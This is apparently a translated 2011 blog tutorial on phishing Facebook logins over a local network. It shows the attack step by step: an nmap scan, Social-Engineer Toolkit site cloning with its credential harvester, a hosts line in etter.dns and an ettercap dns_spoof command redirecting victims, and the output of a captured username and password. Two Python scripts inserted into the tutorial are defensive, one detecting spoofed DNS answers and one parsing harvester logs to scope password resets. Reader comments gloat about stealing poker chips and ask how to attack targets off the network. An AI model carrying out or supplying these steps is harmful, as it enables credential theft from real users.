The first thing to do is gather information. I have explained this before, here.
Preparation:
- Ettercap-NG
- Social Engineering Toolkit
Note:
- Stop the Apache web server, using the command:
root@bt5r1:~# nmap 172.16.129.1/24
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-25 14:17 WIT
Nmap scan report for 172.16.129.1
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
902/tcp open iss-realsecure
Nmap scan report for 172.16.129.129
Host is up (0.00070s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
2869/tcp open icslap
5357/tcp open wsdapi
10243/tcp open unknown
MAC Address: 00:0C:29:71:E6:CF (VMware)
Nmap scan report for 172.16.129.254
Host is up (0.000066s latency).
All 1000 scanned ports on 172.16.129.254 are filtered
MAC Address: 00:50:56:EE:EB:39 (VMware)
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.88 seconds
Screenshot:
Once we know the target, we prepare the phishing site using SET. Here is the module:
root@bt5r1:~# cd /pentest/exploits/set/
root@bt5r1:/pentest/exploits/set# ./set
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.1 [---]
[---] Codename: 'Rebirth' [---]
[---] Report bugs: davek@social-engineer.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Version: 2.1 [---]
[---] Codename: 'Rebirth' [---]
[---] Report bugs: davek@social-engineer.org [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: http://www.secmaniac.com [---]
Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..
DerbyCon 2011 Sep30-Oct02 - http://www.derbycon.com.
Join us on irc.freenode.net in channel #setoolkit
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
[snip...]
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>6
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
After this the phishing site is almost finished; what we have to do now is decide what we want to steal from the victim. Say we want to steal a Facebook account; the module looks like this:
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] I have read the above message. [*]
Press {return} to continue.
[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
With this, the phishing site is ready. All we have to do is wait for the victim to click the link above printed in purple, https://login.facebook.com/login.php, or else the victim has to go to our link, 172.16.129.1. Hmm, it seems very hard to wait for the victim to visit that link. We use DNS spoofing, so that the victim is always sent to our IP whenever they try to access www.facebook.com. Module:
root@bt5r1:~# nano /usr/share/ettercap/etter.dns
Then add this line at the bottom:
www.facebook.com A 172.16.129.1
This will make the victim always be spoofed to 172.16.129.1 when they try to access www.facebook.com. After that, run this module to activate dns_spoof:
root@bt5r1:~# ettercap -i vmnet8 -T -q -P dns_spoof // //
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on vmnet8... (Ethernet)
vmnet8 -> 00:50:56:C0:00:08 172.16.129.1 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
Screenshot:
After this the preparation is 100% done. We just wait for the victim to access our page. See the screenshot of Windows, not spoofed, accessing Google:
And see the victim being spoofed to the SET phishing page when accessing www.facebook.com. Here is the report from ettercap:
dns_spoof: [www.facebook.com] spoofed to [172.16.129.1]
Screenshot:
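The spoof above works because the victim's resolver is answered with a private LAN address (172.16.129.1) for a public name. That is exactly the kind of answer a defender can flag. The following is an added example, not code from the post or from ettercap or SET: it scans passive DNS answers in a constructed "client qname rdata" line format (an assumption for this example, not any real tool's output), flags a public name resolving into RFC 1918 or loopback space, and cross-checks answers against a reference set obtained out-of-band (the reference addresses here are made up; in practice fill them from a resolver outside the LAN). It also groups the addresses seen per name, since a public name that flips between a private and a public answer is a strong sign of an on-path spoofer racing the real resolver.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: DNS answers observed by a passive monitor on the LAN,
# in a simple "client qname rdata" format (assumed format, not any real tool's).
SAMPLE_DNS_LOG = """\
172.16.129.129 www.google.com 74.125.200.99
172.16.129.129 www.facebook.com 172.16.129.1
172.16.129.129 intranet.corp.local 172.16.129.10
172.16.129.129 www.facebook.com 69.171.224.11
"""

# Reference answers obtained out-of-band (e.g. from a resolver outside the LAN).
# Constructed values for this example; fill from a trusted source in practice.
REFERENCE = {
    "www.google.com": {"74.125.200.99", "74.125.200.103"},
    "www.facebook.com": {"69.171.224.11", "69.171.229.11"},
}

# Zones expected to resolve to private addresses (assumed for this example);
# any other name that resolves into RFC 1918 or loopback space is suspicious.
INTERNAL_SUFFIXES = (".corp.local", ".lan")

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def parse_dns_log(text):
    """Yield (client, qname, rdata) tuples from the constructed log format."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2).lower(), m.group(3)


def is_internal_name(qname):
    """True for names that legitimately live in private address space."""
    return qname.endswith(INTERNAL_SUFFIXES)


def check_answer(qname, rdata, reference=REFERENCE):
    """Return the reasons this answer looks spoofed (empty list if clean)."""
    reasons = []
    try:
        ip = ipaddress.ip_address(rdata)
    except ValueError:
        return ["unparseable rdata"]
    if (ip.is_private or ip.is_loopback) and not is_internal_name(qname):
        reasons.append("public name answered with private/loopback address")
    expected = reference.get(qname)
    if expected is not None and rdata not in expected:
        reasons.append("answer differs from out-of-band reference")
    return reasons


def find_spoofed_answers(text, reference=REFERENCE):
    """Scan a log; return [(client, qname, rdata, reasons)] for flagged answers."""
    findings = []
    for client, qname, rdata in parse_dns_log(text):
        reasons = check_answer(qname, rdata, reference)
        if reasons:
            findings.append((client, qname, rdata, reasons))
    return findings


def answers_per_name(text):
    """Map each qname to the distinct addresses seen for it. A public name
    that flips between a private and a public address is a strong indicator
    of an on-path spoofer answering faster than the real resolver."""
    seen = defaultdict(set)
    for _, qname, rdata in parse_dns_log(text):
        seen[qname].add(rdata)
    return dict(seen)


if __name__ == "__main__":
    for client, qname, rdata, reasons in find_spoofed_answers(SAMPLE_DNS_LOG):
        print(f"ALERT {client}: {qname} -> {rdata} ({'; '.join(reasons)})")
    for qname, addrs in answers_per_name(SAMPLE_DNS_LOG).items():
        if len(addrs) > 1:
            print(f"NOTE {qname} answered with multiple addresses: {sorted(addrs)}")
```

On the sample above only the www.facebook.com answer of 172.16.129.1 is flagged, for both reasons, while the legitimate answers and the intranet name pass. The private-address rule needs no reference data at all, which makes it the cheapest check to deploy first; the reference comparison catches spoofs that point at a public address instead.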
Look at the phishing page created by SET: it is identical to the real one, only the URL is different:
And see the user entering their username and password:
Report from SET:
[*] Information will be displayed to you as it arrives below:
172.16.129.129 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
10.76.80.63 - - [25/Oct/2011 14:26:24] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: charset_test=€,´,€,´,æ°´,Д,Є
PARAM: lsd=
PARAM: return_session=0
PARAM: legacy_return=1
PARAM: display=
PARAM: session_key_only=0
PARAM: trynum=1
PARAM: charset_test=€,´,€,´,æ°´,Д,Є
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=doubledragon
POSSIBLE PASSWORD FIELD FOUND: pass=doubledragon
PARAM: persistent=1
PARAM: default_persistent=0
POSSIBLE USERNAME FIELD FOUND: login=Masuk
[*] WHEN YOUR FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
^C[*] File exported to reports/2011-10-25 14:28:14.508234.html for your reading pleasure...
[*] File in XML format exported to reports/2011-10-25 14:28:14.508234.xml for your reading pleasure...
Press {return} to return to the menu.
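When a harvester log like the one above is recovered during an incident, the responder's job is to work out which accounts were submitted so they can be reset. The following is an added example, not code from the post or from SET: it walks a log in the shape of the harvester console output above (the sample is constructed, with made-up addresses and names) and returns one (client IP, timestamp, username) row per captured submission. It assumes, as the post's own output suggests, that the access-log line preceding a "WE GOT A HIT!" block belongs to the client that posted the form, and it ignores field names that are submit buttons rather than identities (the post shows login=Masuk being reported as a "username"). Passwords are deliberately not extracted: for reset scoping you need who, not what.

```python
import re

# Constructed excerpt in the shape of a SET credential-harvester console log.
# Addresses, names and timestamps are made up for this example.
SAMPLE_HARVESTER_LOG = """\
[*] Information will be displayed to you as it arrives below:
192.0.2.10 - - [25/Oct/2011 14:25:12] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=
POSSIBLE USERNAME FIELD FOUND: email=alice@example.org
POSSIBLE PASSWORD FIELD FOUND: pass=hunter2
POSSIBLE USERNAME FIELD FOUND: login=Masuk
192.0.2.11 - - [25/Oct/2011 14:30:01] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: email=bob@example.org
POSSIBLE PASSWORD FIELD FOUND: pass=secret
"""

# Access-log line: client IP and bracketed timestamp before the request string.
ACCESS_RE = re.compile(r'^(\d+\.\d+\.\d+\.\d+) - - \[([^\]]+)\] "')
USER_RE = re.compile(r"^POSSIBLE USERNAME FIELD FOUND: (\w+)=(.*)$")

# Field names that are submit buttons, not identities (assumed list).
BUTTON_FIELDS = {"login", "submit"}


def affected_accounts(text):
    """Return [(client_ip, timestamp, username)] for each captured submission.

    Assumption: the most recent access-log line before a "WE GOT A HIT!"
    block identifies the client that posted the form. Username is taken from
    the first non-button USERNAME field in that block; None if there was none.
    """
    results = []
    client, stamp = None, None
    current = None
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            client, stamp = m.group(1), m.group(2)
            continue
        if line.startswith("[*] WE GOT A HIT!"):
            current = {"client": client, "stamp": stamp, "user": None}
            results.append(current)
            continue
        m = USER_RE.match(line)
        if (m and current is not None and current["user"] is None
                and m.group(1) not in BUTTON_FIELDS):
            current["user"] = m.group(2)
    return [(r["client"], r["stamp"], r["user"]) for r in results]


def distinct_usernames(text):
    """Sorted, de-duplicated list of usernames that need a credential reset."""
    return sorted({u for _, _, u in affected_accounts(text) if u})


if __name__ == "__main__":
    for client, stamp, user in affected_accounts(SAMPLE_HARVESTER_LOG):
        print(f"{stamp}  {client}  {user}")
    print("reset:", distinct_usernames(SAMPLE_HARVESTER_LOG))
```

Run on the sample it yields two rows, one per hit, and a reset list of two addresses; the login=Masuk button is correctly not treated as an account.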
Screenshot:
That's it for this tutorial, hope it's useful (=
Blue Dragon
Where do I enter the command?
AWESOMEEEE BOSSSSS................... HANDS-ON PRACTICE>>> GRABBING PEOPLE'S POKER CHIPS..hahahahaha
Wow, nice, but when I use that exploit in SET, I enter the real FB URL and it's still FB, even though it's already spoofed; then I enter my own IP and only then does the redirect page open. What's going on?
If the victim is already logged in to Facebook, it seems this method no longer has any effect, bro. Is there a solution, bro?
I succeeded with this method, bro, but what I'm asking is: what if the Facebook account to be hacked is not on the same network, but is a specific target located outside our network, bro?
Thank you